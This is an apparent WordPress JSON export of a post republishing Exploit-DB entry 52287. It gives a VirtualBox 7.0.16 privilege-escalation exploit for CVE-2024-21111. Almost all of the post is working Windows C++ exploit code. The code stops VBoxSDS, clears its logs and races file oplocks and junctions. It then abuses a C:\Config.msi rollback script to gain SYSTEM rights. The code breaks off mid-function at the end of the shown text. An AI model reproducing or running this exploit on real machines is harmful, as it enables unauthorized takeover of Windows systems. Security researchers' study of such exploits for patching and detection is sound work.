{"id":3803,"date":"2025-05-09T14:43:12","date_gmt":"2025-05-09T14:43:12","guid":{"rendered":"http:\/\/localhost\/?p=3803"},"modified":"2025-05-09T14:43:12","modified_gmt":"2025-05-09T14:43:12","slug":"virtualbox-7016-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=3803","title":{"rendered":"VirtualBox 7.0.16 &#8211; Privilege Escalation"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">VirtualBox 7.0.16 &#8211; Privilege Escalation<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52287<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-09T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-09T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">7.8<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ff4444; font-weight: bold;\">HIGH<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2024-21111<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: VirtualBox 7.0.16 &#8211; Privilege Escalation Date: 2025-05-06 Exploit Author: Milad Karimi (Ex3ptionaL) Contact: miladgrayhat@gmail.com Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL Tested on: Win&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: VirtualBox 7.0.16 &#8211; Privilege Escalation<br \/>\n<br \/># Date: 2025-05-06<br \/>\n<br \/># Exploit Author: Milad Karimi (Ex3ptionaL)<br \/>\n<br \/># Contact: miladgrayhat@gmail.com<br \/>\n<br \/># Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL<br \/>\n<br \/># Tested on: Win x64<br \/>\n<br \/># CVE : CVE-2024-21111<\/p>\n<p>#include <Windows.h><br \/>\n<br \/>#include <Shlwapi.h><br \/>\n<br \/>#include <WtsApi32.h><br \/>\n<br \/>#include <Msi.h><br \/>\n<br \/>#include <PathCch.h><br \/>\n<br \/>#include <AclAPI.h><br \/>\n<br \/>#include <iostream><br \/>\n<br \/>#include &#8220;resource.h&#8221;<br \/>\n<br \/>#include &#8220;def.h&#8221;<br \/>\n<br \/>#include &#8220;FileOplock.h&#8221;<br \/>\n<br \/>#pragma comment(lib, &#8220;Msi.lib&#8221;)<br \/>\n<br \/>#pragma comment(lib, &#8220;Shlwapi.lib&#8221;)<br \/>\n<br \/>#pragma comment(lib, &#8220;wtsapi32&#8221;)<br \/>\n<br \/>#pragma comment(lib, &#8220;PathCch.lib&#8221;)<br \/>\n<br \/>#pragma comment(lib, &#8220;rpcrt4.lib&#8221;)<br \/>\n<br \/>#pragma warning(disable:4996)<br \/>\n<br \/>struct __declspec(uuid(&#8220;74AB5FFE-8726-4435-AA7E-876D705BCBA5&#8221;))<br \/>\n<br \/>CLSID_VBoxSDS;<br \/>\n<br \/>FileOpLock* oplock;<br \/>\n<br \/>HANDLE hFile, vb11, h;<br \/>\n<br \/>HANDLE hthread;<br \/>\n<br \/>NTSTATUS retcode;<br \/>\n<br \/>HMODULE hm = GetModuleHandle(NULL);<br \/>\n<br \/>HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_RBS1), L&#8221;rbs&#8221;);<br \/>\n<br \/>DWORD RbsSize = SizeofResource(hm, res);<br \/>\n<br \/>void* RbsBuff = LoadResource(hm, res);<br \/>\n<br \/>WCHAR dir[MAX_PATH] = { 0x0 };<br \/>\n<br \/>wchar_t filen[MAX_PATH] = { 0x0 };<br \/>\n<br \/>DWORD WINAPI install(void*);<br \/>\n<br \/>BOOL Move(HANDLE hFile);<br \/>\n<br \/>void callback();<br \/>\n<br \/>HANDLE getDirectoryHandle(LPWSTR file, DWORD access, DWORD share, DWORD<br \/>\n<br \/>dispostion);<br \/>\n<br \/>LPWSTR BuildPath(LPCWSTR path);<br \/>\n<br \/>void loadapis();<br \/>\n<br \/>VOID cb1();<br \/>\n<br \/>VOID cb0();<br \/>\n<br \/>BOOL Monitor(HANDLE hDir);<br \/>\n<br \/>BOOL clearDataDir();<br \/>\n<br \/>BOOL CreateJunction(LPCWSTR dir, LPCWSTR target) {<br \/>\n<br \/> HANDLE hJunction;<br \/>\n<br \/> DWORD cb;<br \/>\n<br \/> wchar_t printname[] = L&#8221;&#8221;;<br \/>\n<br \/> HANDLE hDir;<br \/>\n<br \/> hDir = CreateFile(dir, FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ, NULL,<br \/>\n<br \/>OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);<br \/>\n<br \/> if (hDir == INVALID_HANDLE_VALUE) {<br \/>\n<br \/>  printf(&#8220;[!] Failed to obtain handle on directory %ls.\\n&#8221;, dir);<br \/>\n<br \/>  return FALSE;<br \/>\n<br \/> }<br \/>\n<br \/> SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);<br \/>\n<br \/> SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);<br \/>\n<br \/> SIZE_T PathLen = TargetLen + PrintnameLen + 12;<br \/>\n<br \/> SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER,<br \/>\n<br \/>GenericReparseBuffer.DataBuffer));<br \/>\n<br \/> PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);<br \/>\n<br \/> Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;<br \/>\n<br \/> Data->ReparseDataLength = PathLen;<br \/>\n<br \/> Data->Reserved = 0;<br \/>\n<br \/> Data->MountPointReparseBuffer.SubstituteNameOffset = 0;<br \/>\n<br \/> Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;<br \/>\n<br \/> memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);<br \/>\n<br \/> Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);<br \/>\n<br \/> Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;<br \/>\n<br \/> memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1,<br \/>\n<br \/>printname, PrintnameLen + 2);<br \/>\n<br \/> if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL,<br \/>\n<br \/>0, &#038;cb, NULL) != 0)<br \/>\n<br \/> {<br \/>\n<br \/>  printf(&#8220;[+] Junction %ls -> %ls created!\\n&#8221;, dir, target);<br \/>\n<br \/>  free(Data);<br \/>\n<br \/>  return TRUE;<br \/>\n<br \/> }<br \/>\n<br \/> else<br \/>\n<br \/> {<br \/>\n<br \/>  printf(&#8220;[!] Error: %d. Exiting\\n&#8221;, GetLastError());<br \/>\n<br \/>  free(Data);<br \/>\n<br \/>  return FALSE;<br \/>\n<br \/> }<br \/>\n<br \/>}<br \/>\n<br \/>BOOL DeleteJunction(LPCWSTR path) {<br \/>\n<br \/> REPARSE_GUID_DATA_BUFFER buffer = { 0 };<br \/>\n<br \/> BOOL ret;<br \/>\n<br \/> buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;<br \/>\n<br \/> DWORD cb = 0;<br \/>\n<br \/> IO_STATUS_BLOCK io;<br \/>\n<br \/> HANDLE hDir;<br \/>\n<br \/> hDir = CreateFile(path, FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ, NULL,<br \/>\n<br \/>OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_OPEN_REPARSE_POINT, NULL);<br \/>\n<br \/> if (hDir == INVALID_HANDLE_VALUE) {<br \/>\n<br \/>  printf(&#8220;[!] Failed to obtain handle on directory %ls.\\n&#8221;, path);<br \/>\n<br \/>  printf(&#8220;%d\\n&#8221;, GetLastError());<br \/>\n<br \/>  return FALSE;<br \/>\n<br \/> }<br \/>\n<br \/> ret = DeviceIoControl(hDir, FSCTL_DELETE_REPARSE_POINT, &#038;buffer,<br \/>\n<br \/>REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &#038;cb, NULL);<br \/>\n<br \/> if (ret == 0) {<br \/>\n<br \/>  printf(&#8220;Error: %d\\n&#8221;, GetLastError());<br \/>\n<br \/>  return FALSE;<br \/>\n<br \/> }<br \/>\n<br \/> else<br \/>\n<br \/> {<br \/>\n<br \/>  printf(&#8220;[+] Junction %ls delete!\\n&#8221;, dir);<br \/>\n<br \/>  return TRUE;<br \/>\n<br \/> }<br \/>\n<br \/>}<br \/>\n<br \/>BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {<br \/>\n<br \/> if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object,<br \/>\n<br \/>target)) {<br \/>\n<br \/>  printf(&#8220;[+] Symlink %ls -> %ls created!\\n&#8221;, object, target);<br \/>\n<br \/>  return TRUE;<br \/>\n<br \/> }<br \/>\n<br \/> else<br \/>\n<br \/> {<br \/>\n<br \/>  printf(&#8220;error :%d\\n&#8221;, GetLastError());<br \/>\n<br \/>  return FALSE;<br \/>\n<br \/> }<br \/>\n<br \/>}<br \/>\n<br \/>BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {<br \/>\n<br \/> if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH |<br \/>\n<br \/>DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {<br \/>\n<br \/>  printf(&#8220;[+] Symlink %ls -> %ls deleted!\\n&#8221;, object, target);<br \/>\n<br \/>  return TRUE;<br \/>\n<br \/> }<br \/>\n<br \/> else<br \/>\n<br \/> {<br \/>\n<br \/>  printf(&#8220;error :%d\\n&#8221;, GetLastError());<br \/>\n<br \/>  return FALSE;<br \/>\n<br \/> }<br \/>\n<br \/>}<br \/>\n<br \/>void runSDS(int delay) {<br \/>\n<br \/> if (delay == 1) {<br \/>\n<br \/>  printf(&#8220;[!] sleeping for 2 sec\\n&#8221;);<br \/>\n<br \/>  Sleep(2000);<br \/>\n<br \/> }<br \/>\n<br \/> CoInitialize(NULL);<br \/>\n<br \/> LPVOID ppv;<br \/>\n<br \/> \/\/ 1st trigger to create VBoxSDS.log dir<br \/>\n<br \/> CoCreateInstance(__uuidof(CLSID_VBoxSDS), 0, CLSCTX_LOCAL_SERVER,<br \/>\n<br \/>IID_IUnknown, &#038;ppv);<br \/>\n<br \/> CoUninitialize();<br \/>\n<br \/>}<br \/>\n<br \/>BOOL checkSDSLog() {<br \/>\n<br \/> BOOL clear = FALSE;<br \/>\n<br \/> std::wstring vboxDataDir = L&#8221;C:\\\\ProgramData\\\\VirtualBox\\\\VBoxSDS.log.*&#8221;;<br \/>\n<br \/> HANDLE hFind;<br \/>\n<br \/> WIN32_FIND_DATA data;<br \/>\n<br \/> hFind = FindFirstFile(LPCWSTR(vboxDataDir.c_str()), &#038;data);<br \/>\n<br \/> \/\/ iterate first VBoxSDS.log<br \/>\n<br \/> FindNextFile(hFind, &#038;data);<br \/>\n<br \/> if (hFind != INVALID_HANDLE_VALUE) {<br \/>\n<br \/>  do {<br \/>\n<br \/>   if (wcswcs(data.cFileName, L&#8221;VBoxSDS.log.&#8221;)) {<br \/>\n<br \/>    runSDS(0);<br \/>\n<br \/>    \/\/wprintf(L&#8221;%s\\n&#8221;, data.cFileName);<br \/>\n<br \/>   }<br \/>\n<br \/>   else {<br \/>\n<br \/>    printf(&#8220;[+] Logs have been cleared!\\n&#8221;);<br \/>\n<br \/>    clear = TRUE;<br \/>\n<br \/>   }<br \/>\n<br \/>   \/\/wprintf(L&#8221;%s\\n&#8221;, data.cFileName);<br \/>\n<br \/>  } while (FindNextFile(hFind, &#038;data));<br \/>\n<br \/>  FindClose(hFind);<br \/>\n<br \/> }<br \/>\n<br \/> \/\/printf(&#8220;CLEAR: %d\\n&#8221;, clear);<br \/>\n<br \/> return clear;<br \/>\n<br \/>}<br \/>\n<br \/>BOOL enumProc(const wchar_t* procName) {<br \/>\n<br \/> PWTS_PROCESS_INFO processes{};<br \/>\n<br \/> BOOL ok = FALSE;<br \/>\n<br \/> DWORD count;<br \/>\n<br \/> if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &#038;processes,<br \/>\n<br \/>&#038;count)) {<br \/>\n<br \/>  for (DWORD i = 0; i < count; i++) {\n<br \/>   if (wcswcs(processes[i].pProcessName, procName)) {<br \/>\n<br \/>    wprintf(L&#8221;[!] Process active: %s with PID %d\\n&#8221;,<br \/>\n<br \/>processes[i].pProcessName, processes[i].ProcessId);<br \/>\n<br \/>    ok = TRUE;<br \/>\n<br \/>    break;<br \/>\n<br \/>   }<br \/>\n<br \/>  }<br \/>\n<br \/> }<br \/>\n<br \/> else {<br \/>\n<br \/>  printf(&#8220;err: %d\\n&#8221;, GetLastError());<br \/>\n<br \/> }<br \/>\n<br \/> WTSFreeMemory(processes);<br \/>\n<br \/> return ok;<br \/>\n<br \/>}<br \/>\n<br \/>void checkIfExists() {<br \/>\n<br \/> if (enumProc(L&#8221;VirtualBoxVM.exe&#8221;)) {<br \/>\n<br \/>  printf(&#8220;[!] You seem to have active VMs running, please stop them before<br \/>\n<br \/>running this to prevent corruption of any saved data of the VMs.\\n&#8221;);<br \/>\n<br \/>  exit(1);<br \/>\n<br \/> }<br \/>\n<br \/> if (enumProc(L&#8221;VirtualBox.exe&#8221;)) {<br \/>\n<br \/>  printf(&#8220;[!] VirtualBox process active\\n&#8221;);<br \/>\n<br \/>  \/\/ message<br \/>\n<br \/>  printf(&#8220;[!] Trying to exit virtualbox by postmessage close window\\n&#8221;);<br \/>\n<br \/>  PostMessage(FindWindow(NULL, TEXT(&#8220;Oracle VM VirtualBox Manager&#8221;)),<br \/>\n<br \/>WM_CLOSE, NULL, NULL);<br \/>\n<br \/>  printf(&#8220;[!] Letting VBoxSDS exit (wait 12 seconds)\\n\\n&#8221;);<br \/>\n<br \/>  Sleep(12000);<br \/>\n<br \/>  if (enumProc(L&#8221;VBoxSDS.exe&#8221;)) {<br \/>\n<br \/>   printf(&#8220;[-] error stopping vboxsds\\n&#8221;);<br \/>\n<br \/>   exit(1);<br \/>\n<br \/>  }<br \/>\n<br \/>  else {<br \/>\n<br \/>   printf(&#8220;[+] Success stopping vboxsds!\\n&#8221;);<br \/>\n<br \/>  }<br \/>\n<br \/> }<br \/>\n<br \/>}<br \/>\n<br \/>BOOL clearDataDir() {<br \/>\n<br \/> do {<br \/>\n<br \/>  vb11 = CreateFile(L&#8221;C:\\\\ProgramData\\\\VirtualBox\\\\VBoxSDS.log.11&#8243;, DELETE,<br \/>\n<br \/>FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS,<br \/>\n<br \/>FILE_FLAG_OVERLAPPED, NULL);<br \/>\n<br \/>  printf(&#8220;h: %x %d\\n&#8221;, vb11, GetLastError());<br \/>\n<br \/> } while (vb11 == INVALID_HANDLE_VALUE);<br \/>\n<br \/> oplock = FileOpLock::CreateLock(vb11, cb1);<br \/>\n<br \/> if (oplock != NULL) {<br \/>\n<br \/>  HANDLE c = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)runSDS, NULL, 0,<br \/>\n<br \/>NULL);<br \/>\n<br \/>  oplock->WaitForLock(INFINITE);<br \/>\n<br \/>  CloseHandle(c);<br \/>\n<br \/> }<br \/>\n<br \/> BOOL isEmpty = FALSE;<br \/>\n<br \/> do {<br \/>\n<br \/>  isEmpty = checkSDSLog();<br \/>\n<br \/> } while (isEmpty == FALSE);<br \/>\n<br \/> if (!RemoveDirectory(L&#8221;C:\\\\ProgramData\\\\VirtualBox\\\\VBoxSDS.log&#8221;)) {<br \/>\n<br \/>  printf(&#8220;error removing vboxlog dir\\n&#8221;);<br \/>\n<br \/>  exit(1);<br \/>\n<br \/> }<br \/>\n<br \/> return isEmpty;<br \/>\n<br \/>}<br \/>\n<br \/>int wmain() {<br \/>\n<br \/> loadapis();<br \/>\n<br \/> checkIfExists();<br \/>\n<br \/> clearDataDir();<br \/>\n<br \/> hFile = getDirectoryHandle(BuildPath(L&#8221;C:\\\\Config.msi&#8221;), GENERIC_READ |<br \/>\n<br \/>DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);<br \/>\n<br \/> if (hFile == INVALID_HANDLE_VALUE)<br \/>\n<br \/> {<br \/>\n<br \/>  printf(&#8220;[!] Failed to create C:\\\\Config.msi directory. Trying to delete<br \/>\n<br \/>it.\\n&#8221;);<br \/>\n<br \/>  install(NULL);<br \/>\n<br \/>  hFile = getDirectoryHandle(BuildPath(L&#8221;C:\\\\Config.msi&#8221;), GENERIC_READ |<br \/>\n<br \/>DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);<br \/>\n<br \/>  if (hFile != INVALID_HANDLE_VALUE)<br \/>\n<br \/>  {<br \/>\n<br \/>   printf(&#8220;[+] Successfully removed and recreated C:\\\\Config.Msi.\\n&#8221;);<br \/>\n<br \/>  }<br \/>\n<br \/>  else<br \/>\n<br \/>  {<br \/>\n<br \/>   printf(&#8220;[!] Failed. Cannot remove c:\\\\Config.msi&#8221;);<br \/>\n<br \/>   \/\/return 1;<br \/>\n<br \/>  }<br \/>\n<br \/> }<br \/>\n<br \/> if (!PathIsDirectoryEmpty(L&#8221;C:\\\\Config.Msi&#8221;))<br \/>\n<br \/> {<br \/>\n<br \/>  printf(&#8220;[!] Failed. C:\\\\Config.Msi already exists and is not empty.\\n&#8221;);<br \/>\n<br \/>  \/\/return 1;<br \/>\n<br \/> }<br \/>\n<br \/> printf(&#8220;[+] Config.msi directory created!\\n&#8221;);<br \/>\n<br \/> HANDLE hDir =<br \/>\n<br \/>getDirectoryHandle(BuildPath(L&#8221;C:\\\\ProgramData\\\\VirtualBox&#8221;), GENERIC_READ,<br \/>\n<br \/>FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);<br \/>\n<br \/> printf(&#8220;hDir: %x\\n&#8221;, hDir);<br \/>\n<br \/> \/\/Monitor(hDir);<br \/>\n<br \/> HANDLE zxc{};<br \/>\n<br \/> zxc = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Monitor, hDir, 0,<br \/>\n<br \/>NULL);<br \/>\n<br \/> SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);<br \/>\n<br \/> SetThreadPriorityBoost(GetCurrentThread(), TRUE); \/\/ This lets us maintain<br \/>\n<br \/>express control of our priority<br \/>\n<br \/> SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);<br \/>\n<br \/> oplock = FileOpLock::CreateLock(hFile, callback);<br \/>\n<br \/> if (oplock != nullptr) {<br \/>\n<br \/>  oplock->WaitForLock(INFINITE);<br \/>\n<br \/>  delete oplock;<br \/>\n<br \/> }<br \/>\n<br \/> do {<br \/>\n<br \/>  hFile = getDirectoryHandle(BuildPath(L&#8221;C:\\\\Config.msi&#8221;), GENERIC_READ |<br \/>\n<br \/>WRITE_DAC | READ_CONTROL | DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE |<br \/>\n<br \/>FILE_SHARE_DELETE, FILE_OPEN_IF);<br \/>\n<br \/> } while (!hFile);<br \/>\n<br \/> char buff[4096];<br \/>\n<br \/> DWORD retbt = 0;<br \/>\n<br \/> FILE_NOTIFY_INFORMATION* fn;<br \/>\n<br \/> WCHAR* extension;<br \/>\n<br \/> WCHAR* extension2;<br \/>\n<br \/> do {<br \/>\n<br \/>  ReadDirectoryChangesW(hFile, buff, sizeof(buff) &#8211; sizeof(WCHAR), TRUE,<br \/>\n<br \/>FILE_NOTIFY_CHANGE_FILE_NAME,<br \/>\n<br \/>   &#038;retbt, NULL, NULL);<br \/>\n<br \/>  fn = (FILE_NOTIFY_INFORMATION*)buff;<br \/>\n<br \/>  size_t sz = fn->FileNameLength \/ sizeof(WCHAR);<br \/>\n<br \/>  fn->FileName[sz] = &#8216;\\0&#8217;;<br \/>\n<br \/>  extension = fn->FileName;<br \/>\n<br \/>  PathCchFindExtension(extension, MAX_PATH, &#038;extension2);<br \/>\n<br \/> } while (wcscmp(extension2, L&#8221;.rbs&#8221;) != 0);<br \/>\n<br \/> SetSecurityInfo(hFile, SE_FILE_OBJECT,<br \/>\n<br \/>UNPROTECTED_DACL_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, NULL,<br \/>\n<br \/>NULL, NULL, NULL);<br \/>\n<br \/> while (!Move(hFile)) {<br \/>\n<br \/> }<br \/>\n<br \/> HANDLE cfg_h = getDirectoryHandle(BuildPath(L&#8221;C:\\\\Config.msi&#8221;),<br \/>\n<br \/>FILE_READ_DATA, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,<br \/>\n<br \/>FILE_CREATE);<br \/>\n<br \/> WCHAR rbsfile[MAX_PATH];<br \/>\n<br \/> _swprintf(rbsfile, L&#8221;C:\\\\Config.msi\\\\%s&#8221;, fn->FileName);<br \/>\n<br \/> HANDLE rbs = CreateFile(rbsfile, GENERIC_WRITE, FILE_SHARE_READ |<br \/>\n<br \/>FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, CREATE_ALWAYS,<br \/>\n<br \/>FILE_ATTRIBUTE_NORMAL, NULL);<br \/>\n<br \/> if (WriteFile(rbs, RbsBuff, RbsSize, NULL, NULL)) {<br \/>\n<br \/>  printf(&#8220;[+] Rollback script overwritten!\\n&#8221;);<br \/>\n<br \/> }<br \/>\n<br \/> else<br \/>\n<br \/> {<br \/>\n<br \/>  printf(&#8220;[!] Failed to overwrite rbs file!\\n&#8221;);<br \/>\n<br \/> }<br \/>\n<br \/> CloseHandle(rbs);<br \/>\n<br \/> CloseHandle(cfg_h);<br \/>\n<br \/> DeleteJunction(dir);<br \/>\n<br \/> CloseHandle(zxc);<br \/>\n<br \/> WCHAR asdfasdf[MAX_PATH];<br \/>\n<br \/> _swprintf(asdfasdf, L&#8221;GLOBAL\\\\GLOBALROOT\\\\RPC Control\\\\%s&#8221;, filen);<br \/>\n<br \/> DelDosDeviceSymLink(asdfasdf, L&#8221;\\\\??\\\\C:\\\\Config.msi::$INDEX_ALLOCATION&#8221;);<br \/>\n<br \/> return 0;<br \/>\n<br \/>}<br \/>\n<br \/>DWORD WINAPI install(void*) {<br \/>\n<br \/> HMODULE hm = GetModuleHandle(NULL);<br \/>\n<br \/> HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_MSI1), L&#8221;msi&#8221;);<br \/>\n<br \/> wchar_t msipackage[MAX_PATH] = { 0x0 };<br \/>\n<br \/> GetTempFileName(L&#8221;C:\\\\windows\\\\temp\\\\&#8221;, L&#8221;MSI&#8221;, 0, msipackage);<br \/>\n<br \/> printf(&#8220;[*] MSI file: %ls\\n&#8221;, msipackage);<br \/>\n<br \/> DWORD MsiSize = SizeofResource(hm, res);<br \/>\n<br \/> void* MsiBuff = LoadResource(hm, res);<br \/>\n<br \/> HANDLE pkg = CreateFile(msipackage, GENERIC_WRITE | WRITE_DAC,<br \/>\n<br \/>FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL,<br \/>\n<br \/>CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);<br \/>\n<br \/> WriteFile(pkg, MsiBuff, MsiSize, NULL, NULL);<br \/>\n<br \/> CloseHandle(pkg);<br \/>\n<br \/> MsiSetInternalUI(INSTALLUILEVEL_NONE, NULL);<br \/>\n<br \/> UINT a = MsiInstallProduct(msipackage, L&#8221;ACTION=INSTALL&#8221;);<br \/>\n<br \/> printf(&#8220;%d\\n&#8221;, a);<br \/>\n<br \/> MsiInstallProduct(msipackage, L&#8221;REMOVE=ALL&#8221;);<br \/>\n<br \/> DeleteFile(msipackage);<br \/>\n<br \/> return 0;<br \/>\n<br \/>}<br \/>\n<br \/>BOOL Move(HANDLE hFile) {<br \/>\n<br \/> if (hFile == INVALID_HANDLE_VALUE) {<br \/>\n<br \/>  printf(&#8220;[!] Invalid handle!\\n&#8221;);<br \/>\n<br \/>  return FALSE;<br \/>\n<br \/> }<br \/>\n<br \/> wchar_t tmpfile[MAX_PATH] = { 0x0 };<br \/>\n<br \/> RPC_WSTR str_uuid;<br \/>\n<br \/> UUID uuid = { 0 };<br \/>\n<br \/> UuidCreate(&#038;uuid);<br \/>\n<br \/> UuidToString(&#038;uuid, &#038;str_uuid);<br \/>\n<br \/> _swprintf(tmpfile, L&#8221;\\\\??\\\\C:\\\\windows\\\\temp\\\\%s&#8221;, str_uuid);<br \/>\n<br \/> size_t buffer_sz = sizeof(FILE_RENAME_INFO) + (wcslen(tmpfile) *<br \/>\n<br \/>sizeof(wchar_t));<br \/>\n<br \/> FILE_RENAME_INFO* rename_info =<br \/>\n<br \/>(FILE_RENAME_INFO*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY |<br \/>\n<br \/>HEAP_GENERATE_EXCEPTIONS, buffer_sz);<br \/>\n<br \/> IO_STATUS_BLOCK io = { 0 };<br \/>\n<br \/> rename_info->ReplaceIfExists = TRUE;<br \/>\n<br \/> rename_info->RootDirectory = NULL;<br \/>\n<br \/> rename_info->Flags = 0x00000001 | 0x00000002 | 0x00000040;<br \/>\n<br \/> rename_info->FileNameLength = wcslen(tmpfile) * sizeof(wchar_t);<br \/>\n<br \/> memcpy(&#038;rename_info->FileName[0], tmpfile, wcslen(tmpfile) *<br \/>\n<br \/>sizeof(wchar_t));<br \/>\n<br \/> NTSTATUS status = pNtSetInformationFile(hFile, &#038;io, rename_info,<br \/>\n<br \/>buffer_sz, 65);<br \/>\n<br \/> if (status != 0) {<br \/>\n<br \/>  return FALSE;<br \/>\n<br \/> }<br \/>\n<br \/> return TRUE;<br \/>\n<br \/>}<br \/>\n<br \/>void callback() {<br \/>\n<br \/> SetThreadPriority(GetCurrentThread(), REALTIME_PRIORITY_CLASS);<br \/>\n<br \/> Move(hFile);<br \/>\n<br \/> hthread = CreateThread(NULL, NULL, install, NULL, NULL, NULL);<br \/>\n<br \/> HANDLE hd;<br \/>\n<br \/> do {<br \/>\n<br \/>  hd = getDirectoryHandle(BuildPath(L&#8221;C:\\\\Config.msi&#8221;), GENERIC_READ,<br \/>\n<br \/>FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);<br \/>\n<br \/> } while (!hd);<br \/>\n<br \/> do {<br \/>\n<br \/>  CloseHandle(hd);<br \/>\n<br \/>  hd = getDirectoryHandle(BuildPath(L&#8221;C:\\\\Config.msi&#8221;), GENERIC_READ,<br \/>\n<br \/>FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);<br \/>\n<br \/> } while (hd);<br \/>\n<br \/> CloseHandle(hd);<br \/>\n<br \/> do {<br \/>\n<br \/>  hd = getDirectoryHandle(BuildPath(L&#8221;C:\\\\Config.msi&#8221;), GENERIC_READ,<br \/>\n<br \/>FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);<br \/>\n<br \/>  CloseHandle(hd);<br \/>\n<br \/> } while (retcode != 0xC0000022);<br \/>\n<br \/>}<br \/>\n<br \/>HANDLE getDirectoryHandle(LPWSTR file, DWORD access, DWORD share, DWORD<br \/>\n<br \/>dispostion) {<br \/>\n<br \/> UNICODE_STRING ufile;<br \/>\n<br \/> HANDLE hDir;<br \/>\n<br \/> pRtlInitUnicodeString(&#038;ufile, file);<br \/>\n<br \/> OBJECT_ATTRIBUTES oa = { 0 };<br \/>\n<br \/> IO_STATUS_BLOCK io = { 0 };<br \/>\n<br \/> InitializeObjectAttributes(&#038;oa, &#038;ufile, OBJ_CASE_INSENSITIVE, NULL, NULL);<br \/>\n<br \/> retcode = pNtCreateFile(&#038;hDir, 